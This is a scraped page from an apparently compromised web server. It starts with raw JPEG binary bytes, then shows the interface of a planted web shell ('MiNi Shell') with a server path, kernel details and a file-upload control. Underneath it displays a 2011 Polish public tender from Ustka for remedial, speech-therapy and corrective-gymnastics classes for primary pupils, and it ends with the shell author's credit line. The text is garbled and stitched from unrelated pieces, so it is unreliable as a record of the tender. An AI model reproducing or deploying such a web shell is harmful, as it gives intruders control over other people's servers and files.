JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111228/439602-N-2011.html

<p class="kh_header"><b>Ustka: Usługi edukacyjne obejmujące przeprowadzenie zajęć z zakresu                 indywidualizacji nauczania dzieci klas I-III w ramach                                      projektu  Pomocna dłoń szansą na przyszłość</b><br>
<b>Numer ogłoszenia: 439602 - 2011; data zamieszczenia: 28.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół w Ustce , ul. Dunina 24, 76-270 Ustka, woj. pomorskie, tel. 0-59 8144364, faks 0-59 8144364.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące przeprowadzenie zajęć z zakresu                 indywidualizacji nauczania dzieci klas I-III w ramach                                      projektu  Pomocna dłoń szansą na przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykaz części zamówienia:

Zadanie nr I:  
  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji
Część 1 Szkoła Podstawowa w Charnowie  zajęcia z 11 uczniami w 3 grupach. 
 Łączna liczba godzin lekcyjnych 45,  w tym 45 h  w okresie: styczeń 2012 roku  czerwiec 2012 roku  
Część 2 Szkoła Podstawowa w Gąbinie zajęcia z 14 uczniami  w 3  grupach. Łączna liczba godzin lekcyjnych 120, w tym 120 h  w okresie: styczeń 2012 roku  czerwiec 2012 roku  
Część 3 Szkoła Podstawowa w Objeździe  zajęcia z 24 uczniami w 3 grupach.
Łączna liczba godzin lekcyjnych 54, w tym 54 h  w okresie: styczeń 2012 roku czerwiec 2012 roku
Część 4 Szkoła Podstawowa w Wytownie  zajęcia z 10 uczniami w 2 grupach. 
Łączna liczba godzin lekcyjnych 60, w tym 60 h  w okresie styczeń 2012 roku  czerwiec 2012 roku
Zadanie nr II Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
Część 1 Szkoła Podstawowa w Charnowie  zajęcia z 9 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 45, w tym 45 h  w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 2 Szkoła Podstawowa w Gąbinie  zajęcia z 10 uczniami w 3 grupach
Łączna liczba godzin lekcyjnych 120, w tym 120 h  w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 3 Szkoła Podstawowa w Wytownie zajęcia z 8 uczniami w 2 grupach
Łączna liczba godzin lekcyjnych 60, w tym 60 h  w okresie styczeń 2012 roku  czerwiec 2012 roku  
Zadanie nr III  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy
Część 1 Szkoła Podstawowa w Charnowie  zajęcia z 10 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 90, w tym 90 h w okresie styczeń 2012 roku czerwiec 2012 roku  
Część 2 Szkoła Podstawowa w Gąbinie  zajęcia z 10 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 60, w tym 60 h w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 3 Szkoła Podstawowa w Wytownie  zajęcia z 11 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 90, w tym 90 h  w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 4 Szkoła Podstawowa w Zaleskich zajęcia z 16 uczniami w 5 grupach.  Łączna liczba godzin lekcyjnych 150, w tym 150 h   w okresie  styczeń 2012 roku  czerwiec 2012 roku  
Część 5 Szkoła Podstawowa w Objeździe zajęcia z 20 uczniami w 6 grupach. 
Łączna liczba godzin lekcyjnych 150, w tym 150 h w okresie styczeń 2012 roku czerwiec 2012 roku  
Zadanie nr IV Zajęcia socjoterapeutyczne
Część 1 Szkoła Podstawowa w Charnowie  zajęcia z 8 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 30, w tym 30 h w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 2 Szkoła Podstawowa w Gąbinie  zajęcia z 10 uczniami w 2  grupach.  Łączna liczba godzin lekcyjnych 60, w tym 60 h  w okresie  styczeń 2012 roku  czerwiec 2012 roku  
Część 3 Szkoła Podstawowa w Zaleskich - zajęcia z 10 uczniami w 2 grupach.  Łączna liczba godzin lekcyjnych 180, w tym zajęcia muzykoterapeutyczne w wymiarze 60 godzin lekcyjnych- 60 h w okresie styczeń 2012 roku czerwiec 2012 roku zajęcia socjoterapeutyczne i psychoedukacyjne w wymiarze 120 godzin lekcyjnych 120 h  w okresie  styczeń 2012 roku  czerwiec 2012 roku   
Część 4 Szkoła Podstawowa w Objeździe zajęcia z 25 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 54, w tym 54 h  w okresie  styczeń 2012 roku  czerwiec 2012 roku  
Zadanie nr V Gimnastyka korekcyjna dla dzieci z wadami postawy
Część 1 Szkoła Podstawowa w Charnowie zajęcia z 14 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 40, w tym 40 h w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 2 Szkoła Podstawowa w Gąbinie zajęcia z 16 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 120, w tym 120 h w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 3 Szkoła Podstawowa w Wytownie zajęcia z 10 uczniami w 1 grupie. 
Łączna liczba godzin lekcyjnych 60, w tym 60 h w okresie styczeń 2012 roku czerwiec 2012 roku  
Część 4 Szkoła Podstawowa w Zaleskich  zajęcia z 25 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 90, w tym 90 h - w okresie: styczeń 2012 roku czerwiec 2012 roku  
Część 5 Szkoła Podstawowa w Objeździe zajęcia z 34 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 84, w tym 84 h  w okresie styczeń 2012 roku  czerwiec 2012 roku 
Zadanie nr VI Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych rewalidacja
Część 1 Szkoła Podstawowa w Wytownie - zajęcia z 4 uczniami w 3 grupach. 
Łączna liczba godzin lekcyjnych 90,  w tym 90 h  w okresie  styczeń 2012 roku  czerwiec 2012 roku 
Zadanie nr  VII Specjalistyczne zajęcia terapeutyczne  terapia pedagogiczna
Część 1 Szkoła Podstawowa w Zaleskich  zajęcia z 8 uczniami w 2 grupach. 
Łączna liczba godzin lekcyjnych 60, w tym 60 h w okresie  styczeń 2012 roku  czerwiec 2012 roku  
Zadanie nr VIII  Zajęcia rozwijające zainteresowania uczniów w zakresie matematyczno  przyrodniczym
Część 1 Szkoła Podstawowa w Charnowie  zajęcia z 3 uczniami w 1 grupie. 
 Łączna liczba godzin lekcyjnych 30, w tym 30 h  w okresie styczeń 2012 roku  czerwiec 2012 roku  
Część 2 Szkoła Podstawowa w Wytownie  zajęcia z 5 uczniami w 1 grupie. 
Łączna liczba godzin lekcyjnych 30, w tym 30 h  w okresie  styczeń 2012 roku  czerwiec 2012 roku 
Część 3 Szkoła Podstawowa w Objeździe zajęcia z 25 uczniami w 3 grupach. 
 Łączna liczba godzin lekcyjnych 108, w tym 108 h  w okresie  styczeń 2012 roku  czerwiec 2012 roku
 Zadanie nr IX Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie 
Część 1 Szkoła Podstawowa w Charnowie  zajęcia z 11uczniami w 3 grupach. 
   Łączna liczba godzin lekcyjnych 40,  w tym 40 h - w okresie  styczeń 2012 roku  czerwiec 2012 roku 
Część 2 Szkoła Podstawowa w Wytownie zajęcia z 9 uczniami w 1 grupie 
   Łączna liczba godzin lekcyjnych 60, w tym 60 h  w okresie styczeń 2012 roku  czerwiec 2012 roku 
 Zadanie nr X Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych muzycznie 
Część 1 Szkoła Podstawowa w Wytownie - zajęcia z 3 uczniami  w 1 grupie. 
   Łączna liczba godzin lekcyjnych 30,  w  tym 30 h - w okresie:  styczeń 2012 roku - czerwiec 2012 roku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca udokumentuje posiadanie kwalifikacji do prowadzenia zajęć tzn. wykształcenie wyższe, co najmniej na poziomie licencjata     z przygotowaniem pedagogicznym, dającym kwalifikacje do nauczania zintegrowanego w kl. I do III szkoły podstawowej, posiadającym minimum stopień awansu zawodowego nauczyciela kontraktowego lub dodatkowe kwalifikacje w zakresie oczekiwanych zajęć tj. oligofrenopedagogiki, logopedii, terapii pedagogicznej, socjoterapii, psychoprofilaktyki,  wychowania fizycznego z gimnastyką korekcyjną lub gimnastyki korekcyjnej, w szkole podstawowej, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12.03.2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół  i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli Dz. U. z 2009 r. Nr 50, poz. 400.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca udokumentuje posiadanie kwalifikacji do prowadzenia zajęć tzn. wykształcenie wyższe, co najmniej na poziomie licencjata     z przygotowaniem pedagogicznym, dającym kwalifikacje do nauczania zintegrowanego w kl. I do III szkoły podstawowej, posiadającym minimum stopień awansu zawodowego nauczyciela kontraktowego lub dodatkowe kwalifikacje w zakresie oczekiwanych zajęć tj. oligofrenopedagogiki, logopedii, terapii pedagogicznej, socjoterapii, psychoprofilaktyki,  wychowania fizycznego z gimnastyką korekcyjną lub gimnastyki korekcyjnej, w szkole podstawowej, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12.03.2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół  i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli Dz. U. z 2009 r. Nr 50, poz. 400.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik Nr 1 Formularz  oferty,
Załącznik Nr 4 Oświadczenie na temat wykształcenia, doświadczenia oraz awansu  zawodowego osoby albo osób, które będą wykonywać zamówienie, wraz z informacją o podstawie do dysponowania tą osobą
Załącznik Nr 5 Projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ustka.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Ekonomiczno- Administracyjnej Szkół w Ustce
76-270  Ustka, ul. Dunina 24, pokój Nr 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2012 godzina 10:00, miejsce: Zespół Obsługi Ekonomiczno- Administracyjnej Szkół w Ustce
    76-270  Ustka, ul. Dunina 24, pokój Nr 205.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest prowadzenie zajęć dla dzieci ze specyficznymi trudnościami  w czytaniu i pisaniu w tym także zagrożonych ryzykiem dysleksji dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych; dla dzieci z zaburzeniami rozwoju mowy socjoterapeutycznych gimnastyki korekcyjnej dla dzieci z wadami postawy  specjalistycznych zajęć terapeutycznych dla dzieci niepełnosprawnych rewalidacja specjalistycznych zajęć terapeutycznych  terapia pedagogiczna rozwijających zainteresowania uczniów uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno przyrodniczych rozwijających zainteresowania uczniów szczególnie uzdolnionych plastycznie oraz rozwijających zainteresowania uczniów szczególnie uzdolnionych muzycznie, dla uczniów pięciu szkół podstawowych w gminie Ustka, dla których organem prowadzącym jest Gmina Ustka, w ramach Projektu pn.Pomocna dłoń szansą na przyszłość realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu IX Rozwój Wykształcenia i Kompetencji w Regionach Działania 9.1. Wyrównywanie szans edukacyjnych          i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2. Wyrównywanie szans edukacyjnych uczniów o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com